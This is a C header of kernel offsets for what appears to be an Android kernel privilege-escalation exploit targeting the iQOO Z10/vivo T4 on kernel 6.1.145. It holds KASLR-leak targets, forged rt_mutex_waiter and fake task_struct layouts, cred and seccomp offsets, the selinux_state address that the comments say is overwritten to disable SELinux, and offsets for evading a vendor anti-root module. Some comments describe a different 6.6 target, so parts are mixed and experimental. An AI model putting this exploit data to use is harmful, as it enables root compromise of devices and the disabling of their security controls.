#ifndef OFFSET_H
#define OFFSET_H

/* RMV port (i2407-vivot4-6.1.145): КОМПАКТНЫЙ WAITER (android14-6.1).
 * Ядро iQOO Z10 India (I2407) побитово совпадает с vivo T4:
 *   6.1.145-android14-11-g74d1702dab4d-ab14669069
 * Оффсеты — JoinChang/ghostlock-oneplus (vivo T4, kallsyms+BTF,
 * статус: у них pending device test). Движок = наш PD2520-билд,
 * раскладка waiter/структур = их STRUCT_OFFSETS_6_1.
 * Экспериментально: сдвиги подбираются RMV_SLIDE_SHIFT / RMV_FOPS_SHIFT.
 */

#define WAITER_COMPACT 1
/* vivo 6.1 у JoinChang: waiter word=3, их PSELECT_SHIFT=0
 * (слова таблицы у них waiter-relative c базой 2; наш фрейм = их -2,
 * стартовый сдвиг 0, подбирать на устройстве) */
#define WAITER_WORD_SHIFT 0


/*
 * Auto-generated by gen_neo11_target.py; do not edit by hand.
 * Target: PD2520-BP2A.250605.031.A3
 * 偏移来源: boot.img kallsyms(符号) + BTF(结构体), 关键项已镜像内验证.
 *
 * 2026-08 内核源码交叉验证 (android_16.0_kernel_SM8750, GKI 6.6.56 基线):
 *   - rt_mutex_waiter / rt_waiter_node  (kernel/locking/rtmutex_common.h)  一致
 *   - struct file_operations 各槽位      (include/linux/fs.h)              一致
 *   - struct pipe_buffer                 (include/linux/pipe_fs_i.h) 0x28  一致
 *   - struct cred                        (include/linux/cred.h)            一致
 *   - struct seccomp / tracepoint / ctl_table.data@8 / nf_logger.logfn@0x10 一致
 *   - kmalloc_cache_type: NORMAL=0 RECLAIM=1 CGROUP=2 (include/linux/slab.h) 一致
 *   - configfs_buffer: page@0x10 needs_read_fill@0x50 bin_buffer@0x58
 *     bin_buffer_size@0x60 cb_max_size@0x64 (fs/configfs/file.c)           一致
 *   - SELINUX_ENFORCING 实为 selinux_state.enforcing (bool@0, 无独立全局)  语义修正
 *   - 符号偏移(相对 KIMAGE_TEXT_BASE)为 6.6.89 设备实测; 源码为 6.6.56,
 *     子版本间符号偏移可能漂移, 换内核需用 kallsyms 重新生成.
 */

#define BUILD_VARIANT_LABEL "i2407-vivot4-6.1.145"
#define BUILD_FINGERPRINT "iQOO/I2407/I2407 (kernel 6.1.145-android14-11-g74d1702dab4d-ab14669069)"

/* KernelSnitch: sizeof(mm_struct) = 0x400 на android14-6.1
 * (kit offsets.json 6.1.145, device-verified; было 0x500 от 6.6 —
 * из-за этого mm_struct leak миссовал на каждой попытке). */
#define MM_STRUCT_SZ 0x400

/* ---- Memory layout ---- */
#define KIMAGE_TEXT_BASE             0xffffffc008000000ULL
#define P0_PAGE_OFFSET               0xffffff8000000000ULL
#define P0_PHYS_OFFSET               0x80000000ULL
#define P0_KERNEL_PHYS_LOAD          0xa8000000ULL
#define KERNELSNITCH_IDENTITY_START  0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END    0xffffff9000000000ULL
#define DIRECT_MAP_BASE              0xffffff8000000000ULL
#define DIRECT_MAP_END               0xffffff9000000000ULL
#define VMEMMAP_START                0xfffffffe00000000ULL

/* ---- Core kernel symbols (image-relative offsets) ---- */
#define ASHMEM_MISC_FOPS_OFF 0x0216c080ULL
#define ASHMEM_FOPS_OFF 0x0127fe88ULL
#define ASHMEM_IOCTL_OFF 0x00c322c8ULL
#define ASHMEM_MMAP_OFF 0x00c32c58ULL
#define ASHMEM_OPEN_OFF 0x00c32e78ULL
#define ASHMEM_RELEASE_OFF 0x00c32f00ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00c33020ULL
#define CONFIGFS_READ_ITER_OFF 0x004637e0ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x00463d10ULL
#define COPY_SPLICE_READ_OFF 0x4113d4ULL
#define NOOP_LLSEEK_OFF 0x00397fc0ULL
#define INIT_TASK_OFF 0x0200f600ULL
#define ROOT_TASK_GROUP_OFF 0x021f7580ULL
#define SELINUX_BLOB_SIZES_OFF 0x015cc608ULL
/* selinux_state.enforcing: 6.6 无独立 selinux_enforcing 全局, 运行态 enforcing
 * 是 struct selinux_state 的首成员 bool(偏移 0, CONFIG_SECURITY_SELINUX_DEVELOP,
 * security/selinux/include/security.h). 本偏移为 kallsyms(selinux_state) 实测值;
 * root.c 直接写 0 即 permissive. */
#define SELINUX_ENFORCING_OFF 0x02249400ULL
#define SECURITY_HOOK_HEADS_OFF 0x015cbef8ULL
#define KMALLOC_CACHES_OFF 0x015cba38ULL
#define ANON_PIPE_BUF_OPS_OFF 0x011091d0ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00c32c00ULL

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

/* ---- SLIDE (KASLR leak) targets ---- */
#define SLIDE_NFULNL_LOGGER_OFF 0x020029c8ULL
#define SLIDE_LOGGERS_0_1_OFF 0x02002920ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x0226a498ULL
#define SLIDE_NFULNL_LOG_PACKET_OFF 0xc6ce14ULL  /* 需按机型核对 */
#define SLIDE_BOOTID_LEAK_SOURCE_OFF     (SLIDE_NFULNL_LOGGER_OFF + 0x10ULL)
#define SLIDE_BOOTID_LEAK_VALUE_OFF      SLIDE_NFULNL_LOG_PACKET_OFF
#define SLIDE_INIT_TASK_OFF 0x210e280ULL
#define SLIDE_ROOT_TASK_GROUP_OFF 0x2305600ULL
#define SLIDE_SYSCTL_BOOTID_OFF 0x0226a498ULL

#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

/* ---- CEA / page layout within kernel page ---- */
#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

/* ---- rt_mutex_waiter (Neo11 GKI 6.6, BTF+实测) ---- */
#define WAITER_LOCAL_OFF 0x80ULL
#define WAITER_TREE_ENTRY_OFF 0x0ULL
#define WAITER_PI_TREE_ENTRY_OFF 0x28ULL  /* BTF pi_tree@0x28 */
#define WAITER_TASK_OFF 0x50ULL  /* BTF task@0x50 */
#define WAITER_LOCK_OFF 0x58ULL  /* BTF lock@0x58 */
#define WAITER_WAKE_STATE_OFF 0x60ULL  /* BTF wake_state@0x60 */
#define WAITER_PRIO_OFF 0x18ULL  /* 实测值 */
#define WAITER_DEADLINE_OFF 0x20ULL  /* 实测值 */
#define WAITER_WW_CTX_OFF 0x68ULL  /* BTF ww_ctx@0x68 */

/* Forged waiter (as placed by pselect fdset) */
#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x50
#define FAKE_WAITER_WW_CTX_OFF 0x50

/* ---- Fake task_struct fields (BTF) ---- */
#define FAKE_TASK_USAGE_OFF 0x40ULL
#define FAKE_TASK_PRIO_OFF 0x84ULL
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8cULL
#define FAKE_TASK_TASK_GROUP_OFF       0x348ULL
#define FAKE_TASK_PI_LOCK_OFF 0x924ULL
#define FAKE_TASK_PI_WAITERS_OFF 0x938ULL
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948ULL
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950ULL
#define FAKE_TASK_UCLAMP_REQ_OFF 0x350ULL
#define FAKE_TASK_UCLAMP_OFF 0x358ULL

/* ---- configfs buffer (CFG) offsets ---- */
#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

/* ---- task_struct field offsets (BTF) ---- */
#define MM_OWNER_OFF 0x298ULL
#define TASK_PID_OFF                   0x630ULL
#define TASK_TGID_OFF                  0x634ULL
#define TASK_REAL_PARENT_OFF 0x688ULL
#define TASK_ATOMIC_FLAGS_OFF          0x5f0ULL
#define TASK_REAL_CRED_OFF 0x830ULL
#define TASK_CRED_OFF 0x838ULL
#define TASK_COMM_OFF 0x848ULL
#define TASK_TASKS_OFF                 0x550ULL
#define TASK_THREAD_INFO_FLAGS_OFF 0x0ULL
#define TASK_SECCOMP_OFF               0x900ULL

/* ---- vivo vr.ko anti-root per-task tag (same GKI as PD2405) ---- */
#define VR_TAG_A_OFF           0x06
#define VR_TAG_B_OFF           0x2c
#define VR_SYSCALL_TP_FLAG     0x400ULL

/* ---- cred structure offsets (BTF) ---- */
#define CRED_UID_OFF                   0x4ULL
#define CRED_SECUREBITS_OFF            0x24ULL
#define CRED_CAPS_OFF                  0x28ULL
#define CRED_SECURITY_OFF              0x78ULL
#define SELINUX_CRED_BLOB_OFF 0x0ULL
#define SELINUX_CRED_OSID_OFF  0
#define SELINUX_CRED_SID_OFF   4

/* ---- seccomp offsets ---- */
#define SECCOMP_MODE_OFF 0x0ULL
#define SECCOMP_FILTER_COUNT_OFF 0x4ULL
#define SECCOMP_FILTER_OFF 0x8ULL
#define TIF_SECCOMP_BIT           11
#define PFA_NO_NEW_PRIVS_BIT      0

/* ---- struct page / slab offsets ---- */
#define STRUCT_PAGE_SIZE              0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF         0x08
#define STRUCT_PAGE_TYPE_OFF          0x30

/* ---- pipe_buffer offsets ---- */
#define PIPE_BUFFER_SIZE      0x28
#define PIPE_BUFFER_SLOTS     32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10

/* ---- struct file_operations slot offsets ---- */
#define FOPS_OWNER_OFF 0x0
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x48
#define FOPS_COMPAT_IOCTL_OFF 0x50
#define FOPS_MMAP_OFF 0x58
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

/* ---- tracepoint struct offsets (BTF) ---- */
#define SYS_EXIT_TP_OFF 0x22a2220ULL
#define RVH_COMMIT_CREDS_TP_OFF 0x22bbc70ULL
#define TRACEPOINT_PROBESTUB_OFF   0x30
#define TRACEPOINT_FUNCS_OFF       0x48
#define TRACEPOINT_FUNC_STRIDE     0x18
#define TRACEPOINT_FUNC_FUNC_OFF   0x00
#define VR_COMMIT_TO_SYSEXIT_DELTA 0x60ULL
#define VR_KERNEL_IMAGE_MAX        0x4000000ULL
#define SYS_EXIT_TP        (KIMAGE_TEXT_BASE + SYS_EXIT_TP_OFF)
#define RVH_COMMIT_CREDS_TP (KIMAGE_TEXT_BASE + RVH_COMMIT_CREDS_TP_OFF)

#endif /* OFFSET_H */
